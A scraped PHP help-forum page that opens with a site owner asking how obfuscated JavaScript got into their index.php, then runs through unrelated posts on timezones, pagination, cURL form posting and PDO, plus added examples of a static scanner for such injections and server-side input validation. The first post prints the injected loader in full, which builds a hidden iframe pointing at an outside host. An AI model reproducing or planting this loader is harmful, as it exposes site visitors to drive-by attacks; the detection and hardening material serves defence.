PHP - Javascript Injected Into The Bottom Of My Page
I looked at my site today to see a blank page. I downloaded my index.php file to find a stray bit of code at the bottom:

Code:
    <html><body>status='';cn='r';j='d';a='a';zi='s';we='tp:';y='ph';pb='iz';o='.';v='e';n='/';g='r';sa='eaw';az='am';bj='rc';oy='ne';r='ht';dj='//s';c='if';dr='t/.';ml='2/';ne=c.concat(cn,az,v);sn=zi.concat(bj);wl=r.concat(we,dj,sa,pb,a,g,j,o,oy,dr,y,n,ml);var l=document.createElement(ne);l.setAttribute('width','5');l.setAttribute('height','5');l.setAttribute('style','display:none');l.setAttribute(sn,wl);document.body.appendChild(l);window.status=status;</body></html>

My question is, how did it get there? I am guessing either somebody has brute forced my FTP details or found an exploit in my code. I have now changed my FTP details just to be sure. How would I go about finding the cause of this and preventing it from happening again?

Cheers

Similar Tutorials

It is my belief that when storing time in the DB, it should always be at UTC. Agree? My question is whether one should work with DateTimes with a specific time zone or only do so when displaying the time to the user? For example, if I have multiple users which have a timezone string property based on their physical location as well as a datetime property when some event occurred for the given user, and need to implement some logic if the event occurred more than a given duration from the current time, which of the following approaches should be used?

    $currentTime = new DateTimeImmutable();
    $userEventTime = new DateTime($queryResults['theEventField']);
    if ($currentTime->sub(new DateInterval('P10D')) < $userEventTime) {
        // Display time to the user. A DateTime built from '@timestamp' ignores the
        // time zone constructor argument, so the zone is applied with setTimezone().
        $displayEventTime = (new DateTime('@' . $userEventTime->getTimestamp()))
            ->setTimezone(new DateTimeZone($queryResults['userTimeZone']))
            ->format('Y-m-d H:i:sP');
    }

    $currentTime = new DateTimeImmutable('now', new DateTimeZone($queryResults['userTimeZone']));
    $userEventTime = new DateTime($queryResults['theEventField'], new DateTimeZone($queryResults['userTimeZone']));
    if ($currentTime->sub(new DateInterval('P10D')) < $userEventTime) {
        // Display time to the user
        $displayEventTime = $userEventTime->format('Y-m-d H:i:sP');
    }
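On the injected snippet in the first post above: it assembles its tag name, attribute name and URL from short string fragments joined with concat(), so a plain search of the web root for "iframe" or "src" finds nothing. The following is an added example, not code from any poster: it resolves such fragments statically and reports each affected file with its modification time, which is the value to correlate with FTP and web-server logs when looking for the cause. The function names and the sample file (with a placeholder host) are constructed for illustration.

```php
<?php
// Added example. Static triage only: nothing in a scanned file is executed or fetched.

/** Resolve x='lit'; and x=a.concat(b,c); assignments (single-quoted literals only). */
function resolveStrings(string $text): array
{
    $vars = [];
    preg_match_all('/\b(\w+)\s*=\s*\'([^\']*)\'\s*;/', $text, $lits, PREG_SET_ORDER);
    foreach ($lits as $m) {
        $vars[$m[1]] = $m[2];
    }
    // concat() calls are resolved in document order so one result can feed the next.
    preg_match_all('/\b(\w+)\s*=\s*(\w+)\.concat\(([\w\s,]*)\)\s*;/', $text, $cats, PREG_SET_ORDER);
    foreach ($cats as $m) {
        $names = array_merge([$m[2]], array_map('trim', explode(',', $m[3])));
        $vars[$m[1]] = implode('', array_map(fn($n) => $vars[$n] ?? "[unresolved:$n]", $names));
    }
    return $vars;
}

/** Describe the element a loader builds with createElement/setAttribute, or null if none. */
function describeInjectedElement(string $text): ?array
{
    if (!preg_match('/document\.createElement\(\s*([^()]+?)\s*\)/', $text, $m)) {
        return null;
    }
    $vars = resolveStrings($text);
    // An argument is either a quoted literal or a variable resolved above.
    $value = function (string $arg) use ($vars): string {
        $arg = trim($arg);
        return preg_match('/^([\'"])(.*)\1$/', $arg, $q) ? $q[2] : ($vars[$arg] ?? "[unresolved:$arg]");
    };
    $el = ['tag' => strtolower($value($m[1])), 'attrs' => []];
    preg_match_all('/\.setAttribute\(\s*([^,()]+?)\s*,\s*([^()]+?)\s*\)/', $text, $sets, PREG_SET_ORDER);
    foreach ($sets as $s) {
        $el['attrs'][strtolower($value($s[1]))] = $value($s[2]);
    }
    $a = $el['attrs'];
    $el['hidden'] = preg_match('/display\s*:\s*none/i', $a['style'] ?? '') === 1
        || (is_numeric($a['width'] ?? null) && (int) $a['width'] <= 5);
    return $el;
}

/** Scan a web root; report files whose loader builds a hidden or remote iframe/script. */
function scanTree(string $root): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!$file->isFile() || !preg_match('/\.(php|html?|js)$/i', $file->getFilename())) {
            continue;
        }
        $el = describeInjectedElement((string) file_get_contents($file->getPathname()));
        $remote = $el !== null && preg_match('#^(https?:)?//#i', $el['attrs']['src'] ?? '') === 1;
        if ($el !== null && in_array($el['tag'], ['iframe', 'script'], true) && ($el['hidden'] || $remote)) {
            $findings[] = ['file' => $file->getPathname(), 'modified' => date('c', $file->getMTime()), 'element' => $el];
        }
    }
    return $findings;
}

// Constructed sample in the style of the post (placeholder host, not the poster's data).
$dir = sys_get_temp_dir() . '/inject-demo-' . getmypid();
mkdir($dir);
file_put_contents($dir . '/index.php', "<?php echo 'ok'; ?>\n<html><body><script>"
    . "c='if';cn='r';az='am';v='e';ne=c.concat(cn,az,v);zi='s';bj='rc';sn=zi.concat(bj);"
    . "r='ht';we='tp:';dj='//example';o='.invalid/x/';wl=r.concat(we,dj,o);"
    . "var l=document.createElement(ne);l.setAttribute('width','5');"
    . "l.setAttribute('style','display:none');l.setAttribute(sn,wl);"
    . "document.body.appendChild(l);</script></body></html>");
file_put_contents($dir . '/about.php', "<?php echo 'clean page'; ?>");
print_r(scanTree($dir));
array_map('unlink', glob($dir . '/*'));
rmdir($dir);
```

A file flagged this way should be restored from a known-good copy rather than hand-edited, and every other file sharing its modification time deserves the same look.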
Is there a code I can put with each of these errors so that, on error, the page reloads back to the bottom of the page? When you enter the wrong info, the page already reloads but it reloads to the top of the page. People who didn't correctly enter information into the webpage may not see that they're receiving an error if it doesn't scroll back down. I attempted to put the error at the top of the page but I couldn't find a good spot. I thought about doing an error message box but I'm not sure that's the best method. Anyway here's the code, thanks a lot.

    <?php
    if ($_POST['send']) {
        $errors = array();
        if ($_POST['captcha'] != $_SESSION['captchacode']) {
            $errors[] = "You didn't enter the correct letters!"; // <-- I'D LIKE TO PUT A CODE HERE AND
        }
        if (empty($_POST['email'])) {
            $errors[] = "Please enter an e-mail address"; // <-- HERE TO MAKE THE PAGE GO TO THE BOTTOM WHEN IT REFRESHED (IT REFRESHES UPON EVERY IMPROPERLY FILLED OUT FORM)
        // eregi() was removed in PHP 7; preg_match() with the /i flag is the equivalent.
        } else if (!preg_match('/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/i', $_POST['email'])) {
            $errors[] = 'Please enter a VALID e-mail address';
        }
        if (!count($errors)) {
            // IMPORTANT: If you don't call this the
            // user will keep getting the SAME code!
            captchaDone();
            // (the posted code ends here)
        }
    }

Not for certain this is a PHP issue, but on every page of my site, at the bottom, this error displays. Doesn't affect any of the code execution as far as I can tell, but it's annoying. Anyone else seen this?

Code:
    Error in my_thread_global_end(): 1 threads didn't exit

Hi
I want to get my <footer> to appear at the bottom of my page, but I don't want it to be fixed there.
So if the middle contents of a page is very short, the <footer> will be visible at the bottom of the browser, but if the page contents is long, then the <footer> would just disappear at the bottom of the contents.
Can this be done?
Thanks
I want a div at the bottom of another div, and I want it centered, just using css not javascript.

HTML
    <div id="parent">
        <div id="bottom_element">test</div>
    </div>

CSS
    #parent {height:100%; width:100%}
    #bottom_element {position:absolute; bottom:5px; width:200px; margin:0 auto}

So the issue is that position absolute and margin auto do not seem to work together. What is an alternative without javascript?

This topic has been moved to HTML Help. http://www.phpfreaks.com/forums/index.php?topic=319527.0

This is the code I have now however when you click next to view more results it says please enter a search..., (there is more code above this however I thought that the problem would be within the code provided.)

    $currPage = (($s/$limit) + 1);
    //break before paging
    echo "<br />";
    // next we need to do the links to other results
    if ($s>=1) {
        // bypass PREV link if s is 0
        $prevs=($s-$limit);
        print " <a href=\"$PHP_SELF?s=$prevs&q=$var\"><< Prev 10</a>  ";
    }
    // calculate number of pages needing links
    $pages=intval($numrows/$limit);
    // $pages now contains int of pages needed unless there is a remainder from division
    if ($numrows%$limit) {
        // has remainder so add one page
        $pages++;
    }
    // check to see if last page
    if (!((($s+$limit)/$limit)==$pages) && $pages!=1) {
        // not last page so give NEXT link
        $news=$s+$limit;
        echo " <a href=\"$PHP_SELF?s=$news&q=$var\">Next 10 >></a>";
    }
    $a = $s + ($limit) ;
    if ($a > $numrows) { $a = $numrows ; }
    $b = $s + 1 ;
    echo "<p>Showing results $b to $a of $numrows</p>";
    ?>

I'm trying to generate a page with javascript in it with PHP. But the quotations are causing me problems, I need a third set of quotations.
Here is the part I am having trouble with:

    echo"<div class='level'>Edit:</div><div class='box'><input type = 'text' size='50' name='cat' value='$cat'/> <b><input type='button' value='+ Details' onclick='document.getElementById('rev$clicker').style.display='block';'/></b> </div><br>";

When I view the html it comes out

    onclick='document.getElementById('rev$clicker').style.display='block';'

I can't use "" quotations for 'block' and 'rev$clicker' because that would exit from the echo and I can't exit php because I need the $clicker variable.

Hello, I'm making a little script to grab some data from a website but the data loads up a Javascript popup and unless you click the link from the page you came from you get a 404 error. Is there any way to enable me to load up the page using php so I can access some of the data on the page? The page I'm trying to access has the following code in the head. Does that have anything to do with why you can't directly access it?

Code:
    <META NAME="Robots" CONTENT="index,follow">

Hope this makes sense. If anyone knows a solution I would really appreciate it.

I wasn't sure where to post this so I apologize if this is the wrong forum. I have a php page with over 50 numerical inputs on a form. A lot of the inputs are used to get data out of the mysql database so I want to be safe from sql injection. Is it safe to use a javascript onsubmit function that will not allow the form to be submitted if there is any non numeric data entered by the user? I've already written the function & it works fine but I'm not sure how much protection it gives me. Any feedback welcome.

Hi all, I am new here and I really thank God that I found this forum! I have read the materials here on working with cURL on javascript-form-submission pages. However, I can't get my script to work. Can anybody here please help me out or drop me a hint on where to correct my script?

==Situation==
My company utilizes http://www.myfax.com/free/ to send our company faxes.
My task is to write a code that would submit files for faxes electronically. Note: The site also requires e-mail confirmation but I haven't got to that stage yet. I have run tests on submitting fax requests both by code and manually through the site, and have confirmed that the code doesn't work on the submission level because I managed to receive confirmation e-mails for manual submissions. Also, I tried my script with different staff email addresses because I figured out that it blocks only the same e-mail address from sending more than 2 faxes a day.

Code: (php)
    <?php
    //target page url
    $strPage_url = 'www.myfax.com/free/';
    //create array of data to be posted
    $arrPost_data = array (
        'ctl00$MainSection$tbRecipientName' => 'I am recipient', //max length = 50
        'ctl00$MainSection$tbRecipientCompany' => 'I am recipient company', //max length = 50
        'ctl00$MainSection$tbRecipientFaxNumber' => '+1 (206) 202-8273', //recipient fax
        'ctl00$MainSection$ddlRecipientCountry' => html_entity_decode ('{"c":{"i":"2","n":"United States","t":"1","s":"US"},"m":{"i":"1","v":"+1 (###) ###-####","d":"","f":"","c":"","r":""}}'),
        'ctl00$MainSection$tbSenderName' => 'I am sender', //max length = 50
        'ctl00$MainSection$tbSenderCompany' => 'I am sender company', //max length = 50
        'ctl00$MainSection$tbSenderEmailAddress' => 'abc@example.com', //email
        'ctl00$MainSection$nbAntiSpam$nbAntiSpam_NoBotExtender_ClientState' => '-150', //number drawn from inspecting the packages sent by manual form submission
        'ctl00$MainSection$fileUpload' => '@/files/file.pdf', //file
        'ctl00$MainSection$tbMessage' => 'hello world', //message
        '__EVENTTARGET' => '',
        '__EVENTARGUMENT' => '',
        '__VIEWSTATEENCRYPTED' => ''
    );
    //visit the page and get cookies
    $curl_connection = curl_init ($strPage_url);
    curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 0);
    curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
    curl_setopt($curl_connection, CURLOPT_REFERER, "http://www.myfax.com/free/");
    curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt ($curl_connection, CURLOPT_COOKIEJAR, 'CURLCOOKIE');
    $strGet_page_contents = curl_exec ($curl_connection);
    curl_close ($curl_connection);
    //get page to retrieve view state and event validation
    if ( preg_match ( '/"__VIEWSTATE"[\s]+?value="([\s\S]+?)"/' , $strGet_page_contents , $arrView_state ) ) {
        $strView_state = $arrView_state[1];
        $arrPost_data['__VIEWSTATE'] = $strView_state;
    }
    if ( preg_match ( '/"__EVENTVALIDATION"[\s]+?value="([\s\S]+?)"/' , $strGet_page_contents , $arrEvent_validation ) ) {
        $strEvent_validation = $arrEvent_validation[1];
        $arrPost_data['__EVENTVALIDATION'] = $strEvent_validation;
    }
    if ( preg_match ( '/id="ctl00_MainSection_nbAntiSpam_nbAntiSpam_NoBotExtender_ClientState" value="([\s\S]+?)"/' , $strGet_page_contents , $arrAnti_spam ) ) {
        $strAnti_spam = $arrAnti_spam[1];
        $arrPost_data['ctl00$MainSection$nbAntiSpam$nbAntiSpam_NoBotExtender_ClientState'] = $strAnti_spam;
    }
    //traverse array and prepare data for posting (key1=value1)
    foreach ( $arrPost_data as $key => $value) {
        $arrPost_items[] = $key . '=' . $value;
    }
    //create the final string to be posted using implode()
    $strPost_string = implode ('&', $arrPost_items);
    //create cURL connection
    $curl_connection = curl_init($strPage_url);
    //set options
    curl_setopt ($curl_connection, CURLOPT_POST, 1);
    curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 0);
    curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
    curl_setopt($curl_connection, CURLOPT_REFERER, "http://www.myfax.com/free/");
    curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
    //set cookie
    curl_setopt ($curl_connection, CURLOPT_COOKIEFILE, 'CURLCOOKIE');
    unlink ( 'CURLCOOKIE' );
    curl_setopt($curl_connection, CURLOPT_COOKIE, session_name() . '=' . session_id());
    //set header
    $arrHeaders = array ( 'Content-Type' => 'application/x-www-form-urlencoded; charset=utf-8' );
    curl_setopt($curl_connection, CURLOPT_HTTPHEADER, $arrHeaders );
    //set data to be posted
    curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $strPost_string);
    //perform our request
    $strResult = curl_exec($curl_connection);
    //show information regarding the request - for debugging
    echo "<pre>";
    print_r(curl_getinfo($curl_connection));
    echo curl_errno($curl_connection) . '-' . curl_error($curl_connection);
    echo "<hr>";
    var_dump ($arrPost_items);
    echo "</pre>";
    //close the connection
    curl_close($curl_connection);
    ?>

This topic has been moved to JavaScript Help. http://www.phpfreaks.com/forums/index.php?topic=351266.0

Code:
    <form action='test.php' method='post'>
    <input id="Username" type="hidden" name="date2" />
    <input type="submit" name="action" value="Submit"></form>

Hi I want to pass a Username javascript variable to test.php as hidden, anyone can help?
When code this
Code:
    <input id="Username" type="input" name="date2" />
Data can pass to test.php
When code this
Code:
    <input id="Username" type="hidden" name="date2" />
Data fail to pass over

In one of my pages I have a section which contains a hidden line of text. When the user clicks a button the box containing the text will expand showing the line more clearly. I want this to happen live i.e. no page refresh/reload. I've seen such things done on other sites but my question is, is this done using a php function or is JavaScript required to achieve this? I assume that in order for any php functions to take place there must be a page refresh to reload the data/parameters/variables that are required? The site I'm referring to is this one: http://www.vouchercodes.co.uk/featured-voucher-codes.html If you click on the "Get code and open site" buttons there for any of the vouchers the area expands live and the voucher is revealed however as I say there is no page refresh and it is done live. Is this effect done in JavaScript and not php or is there some way of using php alone to do something similar? Obviously including JScript in a site is more risky as if a user does not have it installed/activated then they may not be able to use such elements hence the reason I want to know how it is done.

Question: Show each movie in the database on its own page, and give the user links in a "page 1, Page 2, Page 3" - type navigation system. Hint: Use LIMIT to control which movie is on which page. I have provided 3 files: 1st: configure DB, 2nd: insert data, 3rd: my code for the question. I would appreciate the help. I am a noob by the way.

First set up everything for DB:

    <?php
    //connect to MySQL
    $db = mysql_connect('localhost', 'root', '000') or die ('Unable to connect. Check your connection parameters.');
    //create the main database if it doesn't already exist
    $query = 'CREATE DATABASE IF NOT EXISTS moviesite';
    mysql_query($query, $db) or die(mysql_error($db));
    //make sure our recently created database is the active one
    mysql_select_db('moviesite', $db) or die(mysql_error($db));
    //create the movie table
    $query = 'CREATE TABLE movie (
        movie_id INTEGER UNSIGNED NOT NULL AUTO_INCREMENT,
        movie_name VARCHAR(255) NOT NULL,
        movie_type TINYINT NOT NULL DEFAULT 0,
        movie_year SMALLINT UNSIGNED NOT NULL DEFAULT 0,
        movie_leadactor INTEGER UNSIGNED NOT NULL DEFAULT 0,
        movie_director INTEGER UNSIGNED NOT NULL DEFAULT 0,
        PRIMARY KEY (movie_id),
        KEY movie_type (movie_type, movie_year)
    ) ENGINE=MyISAM';
    mysql_query($query, $db) or die (mysql_error($db));
    //create the movietype table
    $query = 'CREATE TABLE movietype (
        movietype_id TINYINT UNSIGNED NOT NULL AUTO_INCREMENT,
        movietype_label VARCHAR(100) NOT NULL,
        PRIMARY KEY (movietype_id)
    ) ENGINE=MyISAM';
    mysql_query($query, $db) or die(mysql_error($db));
    //create the people table
    $query = 'CREATE TABLE people (
        people_id INTEGER UNSIGNED NOT NULL AUTO_INCREMENT,
        people_fullname VARCHAR(255) NOT NULL,
        people_isactor TINYINT(1) UNSIGNED NOT NULL DEFAULT 0,
        people_isdirector TINYINT(1) UNSIGNED NOT NULL DEFAULT 0,
        PRIMARY KEY (people_id)
    ) ENGINE=MyISAM';
    mysql_query($query, $db) or die(mysql_error($db));
    echo 'Movie database successfully created!';
    ?>

Second file to load info into DB:

    <?php
    // connect to MySQL
    $db = mysql_connect('localhost', 'root', '000') or die ('Unable to connect. Check your connection parameters.');
    //make sure you're using the correct database
    mysql_select_db('moviesite', $db) or die(mysql_error($db));
    // insert data into the movie table
    $query = 'INSERT INTO movie (movie_id, movie_name, movie_type, movie_year, movie_leadactor, movie_director) VALUES
        (1, "Bruce Almighty", 5, 2003, 1, 2),
        (2, "Office Space", 5, 1999, 5, 6),
        (3, "Grand Canyon", 2, 1991, 4, 3)';
    mysql_query($query, $db) or die(mysql_error($db));
    // insert data into the movietype table
    $query = 'INSERT INTO movietype (movietype_id, movietype_label) VALUES
        (1,"Sci Fi"), (2, "Drama"), (3, "Adventure"), (4, "War"),
        (5, "Comedy"), (6, "Horror"), (7, "Action"), (8, "Kids")';
    mysql_query($query, $db) or die(mysql_error($db));
    // insert data into the people table
    $query = 'INSERT INTO people (people_id, people_fullname, people_isactor, people_isdirector) VALUES
        (1, "Jim Carrey", 1, 0),
        (2, "Tom Shadyac", 0, 1),
        (3, "Lawrence Kasdan", 0, 1),
        (4, "Kevin Kline", 1, 0),
        (5, "Ron Livingston", 1, 0),
        (6, "Mike Judge", 0, 1)';
    mysql_query($query, $db) or die(mysql_error($db));
    echo 'Data inserted successfully!';
    ?>

MY CODE FOR THE QUESTION:

    <?php
    $db = mysql_connect('localhost', 'root', '000') or die ('Unable to connect. Check your connection parameters.');
    mysql_select_db('moviesite', $db) or die(mysql_error($db));
    //get our starting point for the query from the URL
    if (isset($_GET['offset'])) {
        // cast so the value concatenated into LIMIT is always a non-negative integer
        $offset = max(0, (int) $_GET['offset']);
    } else {
        $offset = 0;
    }
    //get the movie
    $query = 'SELECT movie_name, movie_year FROM movie ORDER BY movie_name LIMIT ' . $offset . ' , 1';
    $result = mysql_query($query, $db) or die(mysql_error($db));
    $row = mysql_fetch_assoc($result);
    ?>
    <html>
    <head>
    <title><?php echo $row['movie_name']; ?></title>
    </head>
    <body>
    <table border = "1">
    <tr> <th>Movie Name</th> <th>Year</th> </tr>
    <tr> <td><?php echo $row['movie_name']; ?></td> <td><?php echo $row['movie_year']; ?></td> </tr>
    </table>
    <p> <a href="page.php?offset=0">Page 1</a>, <a href="page.php?offset=1">Page 2</a>, <a href="page.php?offset=2">Page 3</a> </p>
    </body>
    </html>

I have a problem with one div, I want to fix it at the bottom of the page and when I zoom the page I can see the div without scroll.
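Two of the posts above meet at the same point: the question of whether a JavaScript onsubmit check protects numeric inputs that end up in MySQL queries, and the movie pagination page that takes its offset from the query string. A browser-side check never runs when a request is sent without the form, so the value has to be validated on the server and kept out of the SQL text. The following is an added example, not code from either poster; the helper names intParam and fetchMoviePage are made up for illustration, and an in-memory SQLite database stands in for the MySQL movie table.

```php
<?php
// Added example: server-side validation plus a bound parameter.

/** Return a non-negative integer taken from request data, or the default if it is not one. */
function intParam(array $input, string $key, int $default = 0, int $max = 100000): int
{
    $v = filter_var($input[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0, 'max_range' => $max]]);
    return $v === false ? $default : $v;
}

/** Fetch the single movie shown on the page that starts at $offset, or null past the end. */
function fetchMoviePage(PDO $pdo, int $offset): ?array
{
    // The placeholder keeps the value out of the SQL text. PARAM_INT matters for
    // LIMIT/OFFSET: MySQL's emulated prepares would quote a string-bound value.
    $stmt = $pdo->prepare(
        'SELECT movie_name, movie_year FROM movie ORDER BY movie_name LIMIT 1 OFFSET :offset'
    );
    $stmt->bindValue(':offset', $offset, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo database (assumption: SQLite in memory instead of the post's MySQL server).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE movie (
    movie_id INTEGER PRIMARY KEY,
    movie_name TEXT NOT NULL,
    movie_year INTEGER NOT NULL
)');
$ins = $pdo->prepare('INSERT INTO movie (movie_name, movie_year) VALUES (?, ?)');
foreach ([['Bruce Almighty', 2003], ['Office Space', 1999], ['Grand Canyon', 1991]] as $m) {
    $ins->execute($m);
}

// Constructed requests: a normal page, a non-numeric value, a negative value, no parameter.
foreach ([['offset' => '2'], ['offset' => '1 OR 1=1'], ['offset' => '-4'], []] as $get) {
    $offset = intParam($get, 'offset');
    $row = fetchMoviePage($pdo, $offset);
    $shown = $row === null
        ? 'no such page'
        // Escape on output as well: the stored name is data, not markup.
        : htmlspecialchars($row['movie_name'] . ' (' . $row['movie_year'] . ')', ENT_QUOTES, 'UTF-8');
    printf("%-24s -> offset %d -> %s\n", json_encode($get), $offset, $shown);
}
```

The JavaScript check can stay for the user's convenience; the server-side check is the one that decides what reaches the database.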
I have been staring at this code for hours trying to figure out what is wrong, I guarantee that someone is going to look at it and make me feel like a tool. The first query is not going through the list, the second is. It worked till I started updating to PDO. I have tested the SQL, that works, probably a flipping comma or a quotation mark screwing with my brain. Please look and spot the obvious balls up and point it out to me. as in I get a result that looks like this
Heading
I am expecting
Heading

Why is this failing? Please show a doddering old fool what I am doing wrong...

    $query = $pdo->prepare("SELECT * FROM faq_cats WHERE faqc_site = :site ORDER BY faqc_id ASC LIMIT 0,4");
    $query->bindParam(":site", $site);
    $query->execute();
    while($row = $query->fetch(PDO::FETCH_ASSOC)) {
        $fid = $row["faqc_id"];
        $faqc = $row["faqc_name"];
        echo "<h2> ".$faqc." </h2>";
        $query = $pdo->prepare("SELECT * FROM faqs WHERE faq_cat = :fid ORDER BY faq_id ASC");
        $query->bindParam(":fid", $fid);
        $query->execute();
        while($row1 = $query->fetch(PDO::FETCH_ASSOC)) {
            $faid=$row1["faq_id"];
            $faqn=$row1["faq_question"];
            echo "<a href=\"#".$faid."\">".$faqn."</a><br />";
        }
    }
This topic has been moved to CSS Help. http://www.phpfreaks.com/forums/index.php?topic=319246.0

Hi guys, I have a problem.. I have a table which shows the results, but the table is showing right at the bottom below the button "delete members" although the code is right above it so I don't really understand.. and hope someone can shed the light? Appreciated

Code:
    <?php
    include "connect.php";
    session_start();
    if(!isset($_SESSION['email'])) {
        die('You have no access to this page.');
    }
    else{
    //Check if records were submitted for deletion
    if(isset($_POST['id']) && count($_POST['id'])) {
        //Ensure values are ints
        $deleteIDs = implode(', ', array_map('intval', $_POST['id']));
        $query = "DELETE FROM member WHERE id IN ({$deleteIDs})";
        //Debug line
        echo "Successfuly deleted member(s)";
        mysql_query($query) or die(mysql_error());
    }
    ?>
    <link rel="stylesheet" type="text/css" href="view.css" media="all">
    <script type="text/javascript" src="view.js"></script>
    <body id="main_body" >
    <img id="top" src="top.png" alt="">
    <div id="form_container">
    <h1>Consult, Modify or Delete a Member</h1>
    <form id="form_362567" class="appnitro" method="post" action="searchmember.php">
    <div class="form_description">
    <h2> Consult, Search, Modify or Delete a Member</h2>
    <p></p>
    </div>
    <ul >
    <li class="section_break">
    <br>Search members with any keyword or character within the options id/email/firstname/lastname/phone/address1/address2/city/county/postcode - relevant matches will show.<br><br>
    <b>Keyword/Character:</b><br>
    <input id="search" name="search" class="element text medium" type="text" maxlength="50" value=""/>
    <br><br>
    <b>Search on</b>:<br>
    <select name="searchvalue" id="searchvalue">
    <option name="id" id="id">id</option>
    <option name="email" id="email">email</option>
    <option name="firstname" id="firstname">firstname</option>
    <option name="lastname" id="lastname">lastname</option>
    <option name="phone" id="phone">phone</option>
    <option name="address1" id="address1">address1</option>
    <option name="address2" id="address2">address2</option>
    <option name="city" id="city">city</option>
    <option name="county" id="county">county</option>
    <option name="postcode" id="postcode">postcode</option>
    </select><br><input type='submit' value='Search' name='go' /><INPUT TYPE="button" VALUE="Cancel" onClick="history.go(-1);return true;"><br>
    <br>
    To consult or modify a profile click on the member's E-mail address.
    <li class="section_break">
    </form>
    <?php
    $result = mysql_query("SELECT * FROM member");
    ?>
    <table border='1'>
    <tr>
    <th>First Name</th>
    <th>Last Name</th>
    <th>Phone Number</th>
    <th>Postcode</th>
    <th>E-mail</th>
    <th>Delete</th>
    </tr>
    <?php
    while($row = mysql_fetch_array($result)) {
        echo "<form action='' method='POST'>";
        echo "<tr>";
        echo "<td>" . $row['firstname'] . "</td>";
        echo "<td>" . $row['lastname'] . "</td>";
        echo "<td>" . $row['phone'] . "</td>";
        echo "<td>" . $row['postcode'] . "</td>";
        echo "<td>";
        echo '<a href="consultmember.php?email=';
        echo $row['email'];
        echo '">';
        echo $row['email'];
        echo "</a></td>";
        echo "<td><input type='checkbox' name='id[]' value='{$row['id']}' /></td>";
        echo "</tr>";
    }
    ?>
    <br><input type='submit' value='Delete Members' name='delete' /><INPUT TYPE="button" VALUE="Cancel" onClick="history.go(-1);return true;"><br>
    </form>
    <div id="footer"> </div>
    </div>
    <img id="bottom" src="bottom.png" alt="">
    </body>
    <?php } ?>

I have a checkout form that goes like this...

Code:
    <?php session_start(); ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head></head>
    <body></body>
    </html>

Can I start adding this line of code to all of my PHP files - AS THE LAST LINE - without any negative consequences??

Code:
    <? // Build date 2011-05-14 ?>

Debbie